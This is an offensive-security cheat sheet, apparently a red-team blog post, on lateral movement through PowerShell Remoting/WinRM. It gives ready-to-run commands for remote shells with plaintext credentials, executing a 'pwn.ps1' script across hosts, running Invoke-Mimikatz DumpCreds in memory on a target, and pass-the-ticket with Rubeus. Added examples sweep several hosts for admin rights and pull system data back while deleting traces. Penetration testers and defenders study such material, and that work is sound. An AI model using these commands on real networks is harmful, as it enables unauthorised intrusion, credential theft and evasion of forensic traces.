PSRemoting Lateral Movement

05.06.2024 · dadevel

Lateral Movement over WinRM. PSRemoting talks to the WinRM service on TCP 5985 (HTTP) or 5986 (HTTPS); the remote user must be a member of the local Administrators or Remote Management Users group on the target, otherwise the connection is rejected as access denied.

Create a credential object (the password only has to be a SecureString for the constructor, it is still recoverable from memory).

$c = New-Object System.Management.Automation.PSCredential -ArgumentList ('jdoe', (ConvertTo-SecureString 'passw0rd' -AsPlainText -Force))

Open interactive shell on remote system.

Enter-PSSession -Credential $c -ComputerName srv01.corp.local

Execute a command on multiple systems at once. Targets are processed in parallel (up to -ThrottleLimit, default 32) and each result is tagged with the PSComputerName property.

Invoke-Command -Credential $c -ComputerName srv01.corp.local,srv02.corp.local -ScriptBlock {hostname;whoami;}

Execute a local script on multiple systems. The script content is sent over the session, so it does not have to exist on the targets.

Invoke-Command -Credential $c -ComputerName srv01.corp.local,srv02.corp.local -FilePath .\pwn.ps1

Execute a locally defined function on the remote system. ${function:Name} passes the function body as a script block, so the tooling never touches the remote disk.

Import-Module .\mimikatz.ps1
Invoke-Command -Credential $c -ComputerName srv01.corp.local -ScriptBlock ${function:Invoke-Mimikatz} -ArgumentList DumpCreds

Reuse sessions. Every Invoke-Command with -ComputerName sets up and tears down its own session, so for several commands against the same host create one persistent session with New-PSSession and pass it via -Session; variables and imported modules persist between calls in that session.

$s = New-PSSession -Credential $c -ComputerName srv01.corp.local
Invoke-Command -Session $s -ScriptBlock {hostname;}
Invoke-Command -Session $s -ScriptBlock {whoami;}
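The following is an added example, not code from the original post, that combines the steps above into one fan-out run: it reuses the $c credential from above, opens sessions to several hosts in one call, keeps the hosts that failed to connect without aborting, collects a small recon object per host and cleans up afterwards. The host names srv01/srv02/srv03.corp.local are placeholders (srv03 is assumed to be unreachable to show the error handling).

```powershell
# Added example. Assumes $c (PSCredential for jdoe) exists and that the
# targets are placeholder hosts; srv03 is assumed to be down or to refuse WinRM.
$targets = 'srv01.corp.local', 'srv02.corp.local', 'srv03.corp.local'

# One New-PSSession call fans out to all targets. Connection failures (port closed,
# bad credential, user not in Administrators/Remote Management Users) land in
# $connErrors instead of stopping the loop; $sessions only holds the live ones.
$sessions = New-PSSession -ComputerName $targets -Credential $c `
    -ErrorAction SilentlyContinue -ErrorVariable connErrors
foreach ($err in $connErrors) {
    Write-Warning $err.Exception.Message   # message starts with the [hostname] that failed
}
if (-not $sessions) { throw 'no session could be established' }

# Run the same script block in every live session. The remote side returns a
# plain object; PowerShell deserializes it and adds PSComputerName automatically.
$results = Invoke-Command -Session $sessions -ScriptBlock {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]$id
    [pscustomobject]@{
        User    = $id.Name
        IsAdmin = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
        OS      = (Get-CimInstance -ClassName Win32_OperatingSystem).Caption
        Uptime  = (Get-Date) - (Get-CimInstance -ClassName Win32_OperatingSystem).LastBootUpTime
    }
}

# Per-host overview, then the subset where the account actually has admin rights.
$results | Select-Object PSComputerName, User, IsAdmin, OS, Uptime | Format-Table -AutoSize
$adminHosts = $results | Where-Object IsAdmin | Select-Object -ExpandProperty PSComputerName
Write-Host "admin on: $($adminHosts -join ', ')"

# The sessions stay open (and keep remote state) until removed; always clean up,
# otherwise they linger on the target until the WinRM idle timeout expires.
Remove-PSSession -Session $sessions
```

Because the sessions are persistent, anything defined in the script block (functions, variables, loaded modules) can be used by a later Invoke-Command -Session call against the same host without re-sending it.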

Establish a session with Kerberos authentication using the current logon session's TGT. Address the target by FQDN: with an IP address or a non-domain host WinRM falls back to NTLM and additionally requires the target to be listed in the client's WSMan TrustedHosts. Afterwards klist should show a service ticket for HTTP/srv01.corp.local, the SPN WinRM requests.

$s = New-PSSession -Authentication Kerberos -ComputerName srv01.corp.local
Invoke-Command -Session $s -ScriptBlock {hostname;whoami;}

Establish a session through pass-the-ticket. %BASE64KIRBI% is a placeholder for the base64-encoded .kirbi; after injection NegotiateWithImplicitCredential makes WinRM use the ticket of the current logon session instead of prompting for a credential.

.\rubeus.exe ptt /ticket:%BASE64KIRBI%
Invoke-Command -ScriptBlock {whoami} -ComputerName srv01.corp.local -Authentication NegotiateWithImplicitCredential

Copy a file to the remote system over the existing session, so no SMB access to the target is needed (-ToSession and -FromSession require PowerShell 5.0 or later on the client).

Copy-Item -Path .\local.txt -ToSession $s -Destination C:\Users\jdoe\remote.txt
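As an added example that is not part of the original post: a round trip over the session $s from above, pushing a file, verifying it arrived intact by comparing hashes on both ends, and pulling a file generated on the target back to the operator host. The local file .\local.txt, the remote paths and the hypothetical output file C:\Windows\Temp\sysinfo.txt are assumptions.

```powershell
# Added example. Assumes an open session $s to srv01.corp.local (as jdoe) and a
# local file .\local.txt; all paths are placeholders.
$localFile  = '.\local.txt'
$remoteFile = 'C:\Users\jdoe\remote.txt'

# Push: the file travels inside the WinRM channel, no SMB share needed.
Copy-Item -Path $localFile -ToSession $s -Destination $remoteFile

# Verify the transfer by hashing on both ends instead of trusting the size.
$localHash  = (Get-FileHash -Path $localFile -Algorithm SHA256).Hash
$remoteHash = Invoke-Command -Session $s -ArgumentList $remoteFile -ScriptBlock {
    param($path)
    (Get-FileHash -Path $path -Algorithm SHA256).Hash
}
if ($localHash -ne $remoteHash) { throw "transfer of $remoteFile is corrupt" }

# Pull: produce a file on the target, fetch it with -FromSession, then remove
# the remote copy so nothing is left behind.
$remoteOut = 'C:\Windows\Temp\sysinfo.txt'
Invoke-Command -Session $s -ArgumentList $remoteOut -ScriptBlock {
    param($path)
    systeminfo.exe | Out-File -FilePath $path -Encoding utf8
}
Copy-Item -FromSession $s -Path $remoteOut -Destination ".\$($s.ComputerName)-sysinfo.txt"
Invoke-Command -Session $s -ArgumentList $remoteOut -ScriptBlock {
    param($path)
    Remove-Item -Path $path -Force
}
```

-ToSession/-FromSession also accept -Recurse for directories; for large transfers the WinRM channel is considerably slower than SMB, so keep payloads small.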

Note: WinRM-based PSRemoting from PowerShell on Linux is only partially supported; it depends on the system's GSSAPI/NTLM libraries and Kerberos setup, so expect authentication failures there. SSH-based remoting (-HostName/-SSHTransport) is the better-supported transport from Linux, but it requires an SSH server on the target.
